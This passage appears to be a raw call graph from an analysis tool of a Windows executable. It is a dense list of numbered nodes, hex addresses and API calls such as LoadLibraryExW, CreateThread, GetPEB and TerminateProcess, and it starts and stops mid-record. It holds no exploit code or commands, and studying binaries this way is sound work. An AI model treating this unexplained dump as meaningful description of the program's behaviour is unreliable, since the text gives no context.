c0d7f __alloca_probe_16 std::bad_exception::bad_exception 9245->9252 9264 c0ced 9246->9264 9248 b9261 CatchGuardHandler 5 API calls 9247->9248 9251 bffa1 9248->9251 9250->9252 9256 c2ef4 9251->9256 9252->9246 9253 c0e0e ___scrt_uninitialize_crt MultiByteToWideChar 9252->9253 9254 c0dc8 9253->9254 9254->9246 9255 c0dcf GetStringTypeW 9254->9255 9255->9246 9257 bf8e8 __strnicoll 48 API calls 9256->9257 9258 c2f07 9257->9258 9270 c2f3d 9258->9270 9268 c0e38 9261->9268 9265 c0cf9 9264->9265 9266 c0d0a 9264->9266 9265->9266 9267 c00eb ___free_lconv_mon 14 API calls 9265->9267 9266->9247 9267->9266 9269 c0e2a MultiByteToWideChar 9268->9269 9269->9245 9271 c2f58 9270->9271 9272 c0e0e ___scrt_uninitialize_crt MultiByteToWideChar 9271->9272 9276 c2f9c 9272->9276 9273 c3117 9274 b9261 CatchGuardHandler 5 API calls 9273->9274 9275 bffc2 9274->9275 9275->9239 9276->9273 9277 c0c65 15 API calls 9276->9277 9279 c2fc2 __alloca_probe_16 9276->9279 9290 c306a 9276->9290 9277->9279 9278 c0ced __freea 14 API calls 9278->9273 9280 c0e0e ___scrt_uninitialize_crt MultiByteToWideChar 9279->9280 9279->9290 9281 c300b 9280->9281 9281->9290 9298 bec7c 9281->9298 9284 c3079 9286 c3102 9284->9286 9288 c0c65 15 API calls 9284->9288 9291 c308b __alloca_probe_16 9284->9291 9285 c3041 9287 bec7c 6 API calls 9285->9287 9285->9290 9289 c0ced __freea 14 API calls 9286->9289 9287->9290 9288->9291 9289->9290 9290->9278 9291->9286 9292 bec7c 6 API calls 9291->9292 9293 c30ce 9292->9293 9293->9286 9304 c2151 9293->9304 9295 c30e8 9295->9286 9296 c30f1 9295->9296 9297 c0ced __freea 14 API calls 9296->9297 9297->9290 9299 bef77 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9298->9299 9300 bec87 9299->9300 9301 becd9 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9300->9301 9303 bec8d 9300->9303 9302 beccd LCMapStringW 9301->9302 9302->9303 9303->9284 9303->9285 9303->9290 9305 c2164 ___scrt_uninitialize_crt 9304->9305 9306 c21a2 WideCharToMultiByte 9305->9306 9306->9295 9307->9185 9318 bf802 9308->9318 9310 bfe5a 9311 bf802 48 API calls 9310->9311 9312 bfe79 9311->9312 9313 bfea0 9312->9313 9314 c00eb ___free_lconv_mon 14 API calls 9312->9314 9315 c00df 9313->9315 9314->9313 9332 bd198 LeaveCriticalSection 9315->9332 9317 c00cd 9317->8828 9319 bf813 9318->9319 9328 bf80f CatchIt 9318->9328 9320 bf81a 9319->9320 9323 bf82d std::bad_exception::bad_exception 9319->9323 9321 c0777 __strnicoll 14 API calls 9320->9321 9322 bf81f 9321->9322 9324 bcd89 __strnicoll 48 API calls 9322->9324 9325 bf85b 9323->9325 9326 bf864 9323->9326 9323->9328 9324->9328 9327 c0777 __strnicoll 14 API calls 9325->9327 9326->9328 9330 c0777 __strnicoll 14 API calls 9326->9330 9329 bf860 9327->9329 9328->9310 9331 bcd89 __strnicoll 48 API calls 9329->9331 9330->9329 9331->9328 9332->9317 9334 be6e8 9333->9334 9335 be6da 9333->9335 9336 c0777 __strnicoll 14 API calls 9334->9336 9335->9334 9337 be700 9335->9337 9341 be6f0 9336->9341 9339 be6fa 9337->9339 9340 c0777 __strnicoll 14 API calls 9337->9340 9338 bcd89 __strnicoll 48 API calls 9338->9339 9339->8773 9340->9341 9341->9338 9346 bcb7d 9342->9346 9347 bcb9a 9342->9347 9343 bcb94 9345 c00eb ___free_lconv_mon 14 API calls 9343->9345 9344 c00eb ___free_lconv_mon 14 API calls 9344->9346 9345->9347 9346->9343 9346->9344 9347->8778 9349 bcdc2 9348->9349 9350 bcdea CallUnexpected 8 API calls 9349->9350 9351 bcdd7 GetCurrentProcess TerminateProcess 9350->9351 9351->8783 9353 c232f 9352->9353 9354 c2340 9353->9354 9355 c2353 ___from_strstr_to_strchr 9353->9355 9356 c0777 __strnicoll 14 API calls 9354->9356 9358 c256a 9355->9358 9360 c2373 9355->9360 9357 c2345 9356->9357 9357->8725 9359 c0777 __strnicoll 14 API calls 9358->9359 9361 c256f 9359->9361 9415 c258f 9360->9415 9363 c00eb ___free_lconv_mon 14 API calls 9361->9363 9363->9357 9365 c23b7 9401 c23a3 9365->9401 9419 c25a9 9365->9419 9366 c23b9 9370 c0827 __dosmaperr 14 API calls 9366->9370 9366->9401 9368 c2395 9373 c239e 9368->9373 9374 c23b2 9368->9374 9372 c23c7 9370->9372 9371 c00eb ___free_lconv_mon 14 API calls 9371->9357 9376 c00eb ___free_lconv_mon 14 API calls 9372->9376 9377 c0777 __strnicoll 14 API calls 9373->9377 9378 c258f 48 API calls 9374->9378 9375 c242c 9379 c00eb ___free_lconv_mon 14 API calls 9375->9379 9380 c23d2 9376->9380 9377->9401 9378->9365 9385 c2434 9379->9385 9380->9365 9383 c0827 __dosmaperr 14 API calls 9380->9383 9380->9401 9381 c2477 9382 c20e4 51 API calls 9381->9382 9381->9401 9384 c24a5 9382->9384 9386 c23ee 9383->9386 9388 c00eb ___free_lconv_mon 14 API calls 9384->9388 9392 c2461 9385->9392 9423 c20e4 9385->9423 9390 c00eb ___free_lconv_mon 14 API calls 9386->9390 9387 c255f 9391 c00eb ___free_lconv_mon 14 API calls 9387->9391 9388->9392 9390->9365 9391->9357 9392->9387 9395 c0827 __dosmaperr 14 API calls 9392->9395 9392->9401 9393 c2458 9394 c00eb ___free_lconv_mon 14 API calls 9393->9394 9394->9392 9396 c24f0 9395->9396 9397 c24f8 9396->9397 9398 c2500 9396->9398 9399 c00eb ___free_lconv_mon 14 API calls 9397->9399 9400 be6cc ___std_exception_copy 48 API calls 9398->9400 9399->9401 9402 c250c 9400->9402 9401->9371 9403 c2584 9402->9403 9404 c2513 9402->9404 9405 bcdb6 __strnicoll 11 API calls 9403->9405 9432 c49dc 9404->9432 9407 c258e 9405->9407 9409 c2559 9412 c00eb ___free_lconv_mon 14 API calls 9409->9412 9410 c253a 9411 c0777 __strnicoll 14 API calls 9410->9411 9413 c253f 9411->9413 9412->9387 9414 c00eb ___free_lconv_mon 14 API calls 9413->9414 9414->9401 9416 c259c 9415->9416 9417 c237e 9415->9417 9447 c25fe 9416->9447 9417->9365 9417->9366 9417->9368 9420 c241c 9419->9420 9422 c25bf 9419->9422 9420->9375 9420->9381 9422->9420 9462 c48eb 9422->9462 9424 c210c 9423->9424 9425 c20f1 9423->9425 9427 c211b 9424->9427 9496 c4718 9424->9496 9425->9424 9426 c20fd 9425->9426 9428 c0777 __strnicoll 14 API calls 9426->9428 9503 c474b 9427->9503 9431 c2102 std::bad_exception::bad_exception 9428->9431 9431->9393 9515 c1294 9432->9515 9437 c4a4f 9439 c4a5b 9437->9439 9441 c00eb ___free_lconv_mon 14 API calls 9437->9441 9438 c1294 48 API calls 9440 c4a2c 9438->9440 9442 c2534 9439->9442 9444 c00eb ___free_lconv_mon 14 API calls 9439->9444 9443 c132c 17 API calls 9440->9443 9441->9439 9442->9409 9442->9410 9445 c4a39 9443->9445 9444->9442 9445->9437 9446 c4a43 SetEnvironmentVariableW 9445->9446 9446->9437 9448 c2611 9447->9448 9454 c260c 9447->9454 9449 c0827 __dosmaperr 14 API calls 9448->9449 9459 c262e 9449->9459 9450 c269c 9451 bd37d CallUnexpected 48 API calls 9450->9451 9453 c26a1 9451->9453 9452 c00eb ___free_lconv_mon 14 API calls 9452->9454 9455 bcdb6 __strnicoll 11 API calls 9453->9455 9454->9417 9456 c26ad 9455->9456 9457 c0827 __dosmaperr 14 API calls 9457->9459 9458 c00eb ___free_lconv_mon 14 API calls 9458->9459 9459->9450 9459->9453 9459->9457 9459->9458 9460 be6cc ___std_exception_copy 48 API calls 9459->9460 9461 c268b 9459->9461 9460->9459 9461->9452 9463 c48ff 9462->9463 9464 c48f9 9462->9464 9463->9422 9465 c51b9 9464->9465 9466 c5201 9464->9466 9468 c51bf 9465->9468 9469 c51dc 9465->9469 9478 c5217 9466->9478 9471 c0777 __strnicoll 14 API calls 9468->9471 9473 c0777 __strnicoll 14 API calls 9469->9473 9477 c51fa 9469->9477 9470 c51cf 9470->9422 9472 c51c4 9471->9472 9474 bcd89 __strnicoll 48 API calls 9472->9474 9475 c51eb 9473->9475 9474->9470 9476 bcd89 __strnicoll 48 API calls 9475->9476 9476->9470 9477->9422 9479 c5227 9478->9479 9480 c5241 9478->9480 9481 c0777 __strnicoll 14 API calls 9479->9481 9482 c5249 9480->9482 9483 c5260 9480->9483 9484 c522c 9481->9484 9485 c0777 __strnicoll 14 API calls 9482->9485 9486 c526c 9483->9486 9487 c5283 9483->9487 9488 bcd89 __strnicoll 48 API calls 9484->9488 9489 c524e 9485->9489 9490 c0777 __strnicoll 14 API calls 9486->9490 9491 bf8e8 __strnicoll 48 API calls 9487->9491 9494 c5237 9487->9494 9488->9494 9492 bcd89 __strnicoll 48 API calls 9489->9492 9493 c5271 9490->9493 9491->9494 9492->9494 9495 bcd89 __strnicoll 48 API calls 9493->9495 9494->9470 9495->9494 9497 c4738 HeapSize 9496->9497 9498 c4723 9496->9498 9497->9427 9499 c0777 __strnicoll 14 API calls 9498->9499 9500 c4728 9499->9500 9501 bcd89 __strnicoll 48 API calls 9500->9501 9502 c4733 9501->9502 9502->9427 9504 c4758 9503->9504 9505 c4763 9503->9505 9507 c0c65 15 API calls 9504->9507 9506 c476b 9505->9506 9513 c4774 __dosmaperr 9505->9513 9508 c00eb ___free_lconv_mon 14 API calls 9506->9508 9511 c4760 9507->9511 9508->9511 9509 c479e HeapReAlloc 9509->9511 9509->9513 9510 c4779 9512 c0777 __strnicoll 14 API calls 9510->9512 9511->9431 9512->9511 9513->9509 9513->9510 9514 bc227 __dosmaperr 2 API calls 9513->9514 9514->9513 9516 bf8e8 __strnicoll 48 API calls 9515->9516 9517 c12a6 9516->9517 9518 c12b8 9517->9518 9523 beab6 9517->9523 9520 c132c 9518->9520 9529 c1502 9520->9529 9526 bef43 9523->9526 9527 beebe __dosmaperr 5 API calls 9526->9527 9528 beabe 9527->9528 9528->9518 9530 c152a 9529->9530 9531 c1510 9529->9531 9532 c1550 9530->9532 9533 c1531 9530->9533 9547 c1312 9531->9547 9536 c0e0e ___scrt_uninitialize_crt MultiByteToWideChar 9532->9536 9535 c1344 9533->9535 9551 c12d3 9533->9551 9535->9437 9535->9438 9538 c155f 9536->9538 9539 c1566 GetLastError 9538->9539 9541 c158c 9538->9541 9542 c12d3 15 API calls 9538->9542 9556 c079d 9539->9556 9541->9535 9543 c0e0e ___scrt_uninitialize_crt MultiByteToWideChar 9541->9543 9542->9541 9545 c15a3 9543->9545 9545->9535 9545->9539 9546 c0777 __strnicoll 14 API calls 9546->9535 9548 c131d 9547->9548 9549 c1325 9547->9549 9550 c00eb ___free_lconv_mon 14 API calls 9548->9550 9549->9535 9550->9549 9552 c1312 14 API calls 9551->9552 9553 c12e1 9552->9553 9561 c1275 9553->9561 9564 c078a 9556->9564 9558 c07a8 __dosmaperr 9559 c0777 __strnicoll 14 API calls 9558->9559 9560 c07bb 9559->9560 9560->9546 9562 c0c65 15 API calls 9561->9562 9563 c1282 9562->9563 9563->9535 9565 bf17b __dosmaperr 14 API calls 9564->9565 9566 c078f 9565->9566 9566->9558 9568 aded0 std::_Throw_Cpp_error 9567->9568 9588 b6e20 9568->9588 9571 adef0 9577 adf16 9571->9577 9573 b943d std::_Throw_Cpp_error 52 API calls 9574 ae00a GetCurrentThreadId 9573->9574 9574->9577 9575 af70d 9576 b9261 CatchGuardHandler 5 API calls 9575->9576 9578 ade55 CreateEllipticRgn 9576->9578 9577->9573 9577->9574 9577->9575 9579 b943d 52 API calls std::_Throw_Cpp_error 9577->9579 9580 af701 9577->9580 9957 b9972 WaitForSingleObjectEx 9577->9957 9582 af760 9578->9582 9579->9577 9581 b943d std::_Throw_Cpp_error 52 API calls 9580->9581 9581->9575 9586 af780 9582->9586 9583 af7e8 9584 b9261 CatchGuardHandler 5 API calls 9583->9584 9585 ade94 9584->9585 9585->8587 9586->9583 9962 bd48b 9586->9962 9589 b6e4b std::_Throw_Cpp_error 9588->9589 9602 b6f80 9589->9602 9591 b6e5a 9610 bbd06 9591->9610 9593 b6f44 9629 b943d 9593->9629 9595 b6f5a 9635 b81a0 9595->9635 9597 b6eaa 9597->9593 9597->9595 9625 b8150 9597->9625 9599 b9261 CatchGuardHandler 5 API calls 9601 ade47 9599->9601 9601->9571 9604 b702b std::_Throw_Cpp_error 9602->9604 9603 b91e6 21 API calls std::_Throw_Cpp_error 9603->9604 9604->9603 9605 b8006 9604->9605 9607 b8270 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9604->9607 9609 b8980 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9604->9609 9606 b9261 CatchGuardHandler 5 API calls 9605->9606 9608 b8012 9606->9608 9607->9604 9608->9591 9609->9604 9611 bbd13 9610->9611 9612 bbd27 9610->9612 9613 c0777 __strnicoll 14 API calls 9611->9613 9641 bbd97 9612->9641 9615 bbd18 9613->9615 9618 bcd89 __strnicoll 48 API calls 9615->9618 9617 bbd3c CreateThread 9619 bbd5b GetLastError 9617->9619 9623 bbd67 9617->9623 9658 bbe20 9617->9658 9620 bbd23 9618->9620 9621 c079d __dosmaperr 14 API calls 9619->9621 9620->9597 9621->9623 9650 bbde7 9623->9650 9626 b817c 9625->9626 9627 b9261 CatchGuardHandler 5 API calls 9626->9627 9628 b8189 9627->9628 9628->9597 9630 b9453 std::_Throw_Cpp_error 9629->9630 9765 b969d 9630->9765 9636 b81c8 std::_Throw_Cpp_error 9635->9636 9638 b8253 9636->9638 9953 b9110 9636->9953 9639 b9261 CatchGuardHandler 5 API calls 9638->9639 9640 b6f62 9639->9640 9640->9599 9642 c0827 __dosmaperr 14 API calls 9641->9642 9643 bbda8 9642->9643 9644 c00eb ___free_lconv_mon 14 API calls 9643->9644 9645 bbdb5 9644->9645 9646 bbdd9 9645->9646 9647 bbdbc GetModuleHandleExW 9645->9647 9648 bbde7 16 API calls 9646->9648 9647->9646 9649 bbd33 9648->9649 9649->9617 9649->9623 9651 bbd72 9650->9651 9652 bbdf3 9650->9652 9651->9597 9653 bbdf9 CloseHandle 9652->9653 9654 bbe02 9652->9654 9653->9654 9655 bbe08 FreeLibrary 9654->9655 9656 bbe11 9654->9656 9655->9656 9657 c00eb ___free_lconv_mon 14 API calls 9656->9657 9657->9651 9659 bbe2c __FrameHandler3::FrameUnwindToState 9658->9659 9660 bbe33 GetLastError ExitThread 9659->9660 9661 bbe40 9659->9661 9662 bf02a _unexpected 48 API calls 9661->9662 9663 bbe45 9662->9663 9674 c0996 9663->9674 9666 bbe5c 9678 b80b0 9666->9678 9675 bbe50 9674->9675 9676 c09a6 CallUnexpected 9674->9676 9675->9666 9689 bed0a 9675->9689 9676->9675 9695 bedb3 9676->9695 9698 b8980 9678->9698 9680 b80dd std::_Throw_Cpp_error 9702 b90c0 9680->9702 9685 b81a0 5 API calls 9686 b8116 9685->9686 9687 b9261 CatchGuardHandler 5 API calls 9686->9687 9688 b8125 9687->9688 9692 bbd89 9688->9692 9690 beebe __dosmaperr 5 API calls 9689->9690 9691 bed26 9690->9691 9691->9666 9753 bbe9e 9692->9753 9696 beebe __dosmaperr 5 API calls 9695->9696 9697 bedcf 9696->9697 9697->9675 9699 b89b5 9698->9699 9700 b9261 CatchGuardHandler 5 API calls 9699->9700 9701 b89c5 9700->9701 9701->9680 9710 add90 GetPEB 9702->9710 9705 b98eb GetCurrentThreadId 9745 b9ca6 9705->9745 9709 b9904 __Mtx_unlock __Cnd_broadcast 9748 b9cb2 9709->9748 9715 bd4c7 9710->9715 9712 adde2 9713 b9261 CatchGuardHandler 5 API calls 9712->9713 9714 ade02 9713->9714 9714->9705 9716 bd4da __strnicoll 9715->9716 9721 bd557 9716->9721 9719 bcff7 __strnicoll 48 API calls 9720 bd4f9 9719->9720 9720->9712 9722 bd587 9721->9722 9723 bd596 9722->9723 9724 bd5b4 9722->9724 9742 bd58b 9722->9742 9726 bcf32 __strnicoll 29 API calls 9723->9726 9725 bd5c1 9724->9725 9727 bd4fe ___scrt_uninitialize_crt 48 API calls 9724->9727 9729 bd5db 9725->9729 9730 bd5f9 9725->9730 9726->9742 9727->9725 9728 b9261 CatchGuardHandler 5 API calls 9731 bd4ec 9728->9731 9732 c2a39 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9729->9732 9733 bd789 9730->9733 9734 bd60d 9730->9734 9731->9719 9732->9742 9736 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 9733->9736 9733->9742 9735 bd6a7 9734->9735 9740 bd651 9734->9740 9734->9742 9737 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 9735->9737 9736->9742 9739 bd6ba 9737->9739 9738 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 9738->9742 9741 bd6d3 GetLastError 9739->9741 9739->9742 9740->9738 9741->9742 9744 bd6e2 9741->9744 9742->9728 9743 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 9743->9744 9744->9742 9744->9743 9751 ba1fe EnterCriticalSection 9745->9751 9747 b9cb0 9747->9709 9752 ba20c LeaveCriticalSection 9748->9752 9750 b810e 9750->9685 9751->9747 9752->9750 9754 bf17b __dosmaperr 14 API calls 9753->9754 9756 bbea9 9754->9756 9755 bbeeb ExitThread 9756->9755 9757 bbec2 9756->9757 9762 bed45 9756->9762 9759 bbed5 9757->9759 9760 bbece CloseHandle 9757->9760 9759->9755 9761 bbee1 FreeLibraryAndExitThread 9759->9761 9760->9759 9761->9755 9763 beebe __dosmaperr 5 API calls 9762->9763 9764 bed5e 9763->9764 9764->9757 9766 b96a9 __EH_prolog3_GS 9765->9766 9778 a80c0 9766->9778 9805 b2780 9778->9805 9780 a80ef std::_Throw_Cpp_error 9809 b27d0 9780->9809 9784 a8134 std::_Throw_Cpp_error 9785 b9261 CatchGuardHandler 5 API calls 9784->9785 9786 a814e 9785->9786 9787 b95c6 9786->9787 9869 b9306 9787->9869 9789 b95f7 9873 b9553 9789->9873 9792 af820 std::_Throw_Cpp_error 48 API calls 9793 b9619 9792->9793 9794 b9261 CatchGuardHandler 5 API calls 9793->9794 9795 b9638 9794->9795 9796 af820 9795->9796 9800 af844 std::_Throw_Cpp_error 9796->9800 9797 af993 std::_Throw_Cpp_error 9798 b9261 CatchGuardHandler 5 API calls 9797->9798 9799 af9c9 9798->9799 9802 b9bf9 9799->9802 9800->9797 9801 afa60 std::_Throw_Cpp_error 48 API calls 9800->9801 9801->9800 9803 b9261 CatchGuardHandler 5 API calls 9802->9803 9804 b9c03 9803->9804 9804->9804 9806 b2796 std::_Throw_Cpp_error 9805->9806 9817 b2880 9806->9817 9810 b2813 std::_Throw_Cpp_error 9809->9810 9811 b9261 CatchGuardHandler 5 API calls 9810->9811 9812 a8126 9811->9812 9813 b2830 9812->9813 9814 b2851 std::_Throw_Cpp_error 9813->9814 9821 b3770 9814->9821 9818 b2913 std::_Throw_Cpp_error 9817->9818 9819 b9261 CatchGuardHandler 5 API calls 9818->9819 9820 b27a1 9819->9820 9820->9780 9827 b37a8 std::_Throw_Cpp_error 9821->9827 9822 b38af 9823 b9261 CatchGuardHandler 5 API calls 9822->9823 9824 b2873 9823->9824 9824->9784 9827->9822 9828 b38f0 9827->9828 9832 b3a10 9827->9832 9829 b3916 std::_Throw_Cpp_error 9828->9829 9830 b9261 CatchGuardHandler 5 API calls 9829->9830 9831 b39a5 9830->9831 9831->9827 9843 b3d10 9832->9843 9836 b3a4c std::_Throw_Cpp_error 9838 b3ce8 9836->9838 9850 b5420 9836->9850 9853 b5440 9836->9853 9858 b5480 9836->9858 9862 b54b0 9836->9862 9866 afa60 9836->9866 9839 b9261 CatchGuardHandler 5 API calls 9838->9839 9840 b3cf8 9839->9840 9840->9827 9848 b3dd3 std::_Throw_Cpp_error 9843->9848 9844 b52c4 9845 b9261 CatchGuardHandler 5 API calls 9844->9845 9846 b52d7 9845->9846 9846->9836 9847 b5590 5 API calls std::_Throw_Cpp_error 9847->9848 9848->9844 9848->9847 9849 b5680 5 API calls std::_Throw_Cpp_error 9848->9849 9849->9848 9851 b9866 std::_Xinvalid_argument 50 API calls 9850->9851 9852 b5432 9851->9852 9854 b3d10 std::_Throw_Cpp_error 5 API calls 9853->9854 9855 b545b 9854->9855 9856 b5780 std::_Throw_Cpp_error 5 API calls 9855->9856 9857 b5474 9856->9857 9857->9836 9859 b549a std::_Throw_Cpp_error 9858->9859 9860 b5ed0 std::_Throw_Cpp_error 51 API calls 9859->9860 9861 b54a2 9860->9861 9861->9836 9863 b54f2 std::_Throw_Cpp_error 9862->9863 9864 b9261 CatchGuardHandler 5 API calls 9863->9864 9865 b551a 9864->9865 9865->9836 9867 afad0 std::_Throw_Cpp_error 48 API calls 9866->9867 9868 afa8b 9867->9868 9868->9836 9871 b931e 9869->9871 9870 b9325 CatchIt 9870->9789 9871->9870 9885 b5ed0 9871->9885 9874 b955f __EH_prolog3_GS 9873->9874 9876 b957e std::_Throw_Cpp_error 9874->9876 9926 b936e 9874->9926 9877 b936e std::_Throw_Cpp_error 51 API calls 9876->9877 9878 b95a3 9877->9878 9879 af820 std::_Throw_Cpp_error 48 API calls 9878->9879 9880 b95ab std::_Throw_Cpp_error 9879->9880 9881 af820 std::_Throw_Cpp_error 48 API calls 9880->9881 9882 b95be 9881->9882 9883 b9bf9 std::_Throw_Cpp_error 5 API calls 9882->9883 9884 b95c5 std::domain_error::domain_error 9883->9884 9884->9792 9890 b5ef1 9885->9890 9887 b5feb 9888 b9261 CatchGuardHandler 5 API calls 9887->9888 9889 b5ffb 9888->9889 9889->9870 9890->9887 9892 b6030 9890->9892 9900 b67d0 9890->9900 9894 b60a3 9892->9894 9893 b67d0 std::_Throw_Cpp_error 21 API calls 9893->9894 9894->9893 9895 b61f6 9894->9895 9903 b67f0 9894->9903 9907 bcd99 9894->9907 9896 b9261 CatchGuardHandler 5 API calls 9895->9896 9897 b67bf 9896->9897 9897->9890 9912 b91e6 9900->9912 9902 b67e7 9902->9890 9904 b67fe std::_Throw_Cpp_error 9903->9904 9905 baa1c std::_Throw_Cpp_error RaiseException 9904->9905 9906 b6816 9905->9906 9908 bd0bf __strnicoll 48 API calls 9907->9908 9909 bcda8 9908->9909 9910 bcdb6 __strnicoll 11 API calls 9909->9910 9911 bcdb5 9910->9911 9914 b91eb 9912->9914 9913 bd3e7 ___std_exception_copy 15 API calls 9913->9914 9914->9913 9915 b9205 9914->9915 9916 bc227 __dosmaperr EnterCriticalSection LeaveCriticalSection 9914->9916 9918 b9207 std::_Throw_Cpp_error 9914->9918 9915->9902 9916->9914 9917 b99e1 std::_Throw_Cpp_error 9919 baa1c std::_Throw_Cpp_error RaiseException 9917->9919 9918->9917 9921 baa1c std::_Throw_Cpp_error RaiseException 9918->9921 9920 b99fe IsProcessorFeaturePresent 9919->9920 9923 b9a14 9920->9923 9921->9917 9924 b9af9 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9923->9924 9925 b9af7 9924->9925 9925->9902 9927 b93af 9926->9927 9929 b9385 CatchIt 9926->9929 9930 b978d 9927->9930 9929->9876 9931 b9848 9930->9931 9932 b97b2 9930->9932 9934 b5420 std::_Throw_Cpp_error 50 API calls 9931->9934 9941 b5780 9932->9941 9936 b984d 9934->9936 9937 b5ed0 std::_Throw_Cpp_error 51 API calls 9938 b97ce CatchIt 9937->9938 9940 b981a CatchIt 9938->9940 9947 afad0 9938->9947 9940->9929 9946 b5c55 9941->9946 9942 b5590 std::_Throw_Cpp_error 5 API calls 9942->9946 9943 b5e9d 9944 b9261 CatchGuardHandler 5 API calls 9943->9944 9945 b5eb0 9944->9945 9945->9937 9946->9942 9946->9943 9949 afaf4 9947->9949 9948 afba0 std::_Throw_Cpp_error 48 API calls 9948->9949 9949->9948 9950 afb73 std::_Throw_Cpp_error 9949->9950 9951 b9261 CatchGuardHandler 5 API calls 9950->9951 9952 afb91 9951->9952 9952->9940 9954 b9134 9953->9954 9955 b9261 CatchGuardHandler 5 API calls 9954->9955 9956 b91b6 9955->9956 9956->9636 9958 b99ba 9957->9958 9959 b9988 GetExitCodeThread 9957->9959 9958->9577 9959->9958 9960 b9999 CloseHandle 9959->9960 9960->9577 9963 bd497 __FrameHandler3::FrameUnwindToState 9962->9963 9964 bf02a _unexpected 48 API calls 9963->9964 9967 bd49c 9964->9967 9965 bd37d CallUnexpected 48 API calls 9966 bd4c6 9965->9966 9967->9965 9969 bc07f 9968->9969 9970 bc06d 9968->9970 9986 bc1da 9969->9986 9971 ba40c CallUnexpected GetModuleHandleW 9970->9971 9973 bc072 9971->9973 9973->9969 9980 bbf74 GetModuleHandleExW 9973->9980 9975 bbf2c 9975->8561 9981 bbfb3 GetProcAddress 9980->9981 9982 bbfd4 9980->9982 9981->9982 9985 bbfc7 9981->9985 9983 bbfda FreeLibrary 9982->9983 9984 bbfe3 9982->9984 9983->9984 9984->9969 9985->9982 9987 bc1e6 __FrameHandler3::FrameUnwindToState 9986->9987 10001 bd181 EnterCriticalSection 9987->10001 9989 bc1f0 10002 bc0d7 9989->10002 9991 bc1fd 10006 bc21b 9991->10006 9994 bc00f 10031 bbff6 9994->10031 9996 bc019 9997 bc02d 9996->9997 9998 bc01d GetCurrentProcess TerminateProcess 9996->9998 9999 bbf74 CallUnexpected 3 API calls 9997->9999 9998->9997 10000 bc035 ExitProcess 9999->10000 10001->9989 10004 bc0e3 __FrameHandler3::FrameUnwindToState CallUnexpected 10002->10004 10003 bc147 CallUnexpected 10003->9991 10004->10003 10009 bc78b 10004->10009 10030 bd198 LeaveCriticalSection 10006->10030 10008 bc0b6 10008->9975 10008->9994 10010 bc797 __EH_prolog3 10009->10010 10013 bca16 10010->10013 10012 bc7be CallUnexpected 10012->10003 10014 bca22 __FrameHandler3::FrameUnwindToState 10013->10014 10021 bd181 EnterCriticalSection 10014->10021 10016 bca30 10022 bc8e1 10016->10022 10021->10016 10023 bc900 10022->10023 10024 bc8f8 10022->10024 10023->10024 10025 c00eb ___free_lconv_mon 14 API calls 10023->10025 10026 bca65 10024->10026 10025->10024 10029 bd198 LeaveCriticalSection 10026->10029 10028 bca4e 10028->10012 10029->10028 10030->10008 10034 c096f 10031->10034 10033 bbffb CallUnexpected 10033->9996 10035 c097e CallUnexpected 10034->10035 10036 c098b 10035->10036 10038 bed73 10035->10038 10036->10033 10039 beebe __dosmaperr 5 API calls 10038->10039 10040 bed8f 10039->10040 10040->10036 10043 bba9d 10041->10043 10044 bbaaf ___scrt_uninitialize_crt 10041->10044 10042 bbaab 10042->8604 10043->10042 10046 c04c7 10043->10046 10044->8604 10049 c05f2 10046->10049 10052 c06cb 10049->10052 10053 c06d7 __FrameHandler3::FrameUnwindToState 10052->10053 10060 bd181 EnterCriticalSection 10053->10060 10055 c074d 10069 c076b 10055->10069 10058 c06e1 ___scrt_uninitialize_crt 10058->10055 10061 c063f 10058->10061 10060->10058 10062 c064b __FrameHandler3::FrameUnwindToState 10061->10062 10072 bbb0f EnterCriticalSection 10062->10072 10064 c0655 ___scrt_uninitialize_crt 10065 c068e 10064->10065 10073 c04d0 10064->10073 10086 c06bf 10065->10086 10185 bd198 LeaveCriticalSection 10069->10185 10071 c04ce 10071->10042 10072->10064 10074 c04e5 __strnicoll 10073->10074 10075 c04ec 10074->10075 10076 c04f7 10074->10076 10077 c05f2 ___scrt_uninitialize_crt 77 API calls 10075->10077 10089 c0535 10076->10089 10079 c04f2 10077->10079 10081 bcff7 __strnicoll 48 API calls 10079->10081 10083 c052f 10081->10083 10083->10065 10084 c0518 10102 c313f 10084->10102 10184 bbb23 LeaveCriticalSection 10086->10184 10088 c06ad 10088->10058 10090 c0501 10089->10090 10091 c054e 10089->10091 10090->10079 10095 c2956 10090->10095 10091->10090 10092 c2956 ___scrt_uninitialize_crt 48 API calls 10091->10092 10093 c056a 10092->10093 10113 c347a 10093->10113 10096 c2977 10095->10096 10097 c2962 10095->10097 10096->10084 10098 c0777 __strnicoll 14 API calls 10097->10098 10099 c2967 10098->10099 10100 bcd89 __strnicoll 48 API calls 10099->10100 10101 c2972 10100->10101 10101->10084 10103 c3150 10102->10103 10106 c315d 10102->10106 10104 c0777 __strnicoll 14 API calls 10103->10104 10112 c3155 10104->10112 10105 c31a6 10107 c0777 __strnicoll 14 API calls 10105->10107 10106->10105 10108 c3184 10106->10108 10109 c31ab 10107->10109 10154 c31bc 10108->10154 10111 bcd89 __strnicoll 48 API calls 10109->10111 10111->10112 10112->10079 10114 c3486 __FrameHandler3::FrameUnwindToState 10113->10114 10115 c34c7 10114->10115 10117 c350d 10114->10117 10123 c348e 10114->10123 10116 bcf32 __strnicoll 29 API calls 10115->10116 10116->10123 10124 c28f7 EnterCriticalSection 10117->10124 10119 c3513 10120 c3531 10119->10120 10125 c325e 10119->10125 10151 c3583 10120->10151 10123->10090 10124->10119 10126 c3286 10125->10126 10150 c32a9 ___scrt_uninitialize_crt 10125->10150 10127 c328a 10126->10127 10129 c32e5 10126->10129 10128 bcf32 __strnicoll 29 API calls 10127->10128 10128->10150 10130 c3303 10129->10130 10132 c4a71 ___scrt_uninitialize_crt 50 API calls 10129->10132 10131 c358b ___scrt_uninitialize_crt 49 API calls 10130->10131 10133 c3315 10131->10133 10132->10130 10134 c331b 10133->10134 10135 c3362 10133->10135 10136 c334a 10134->10136 10141 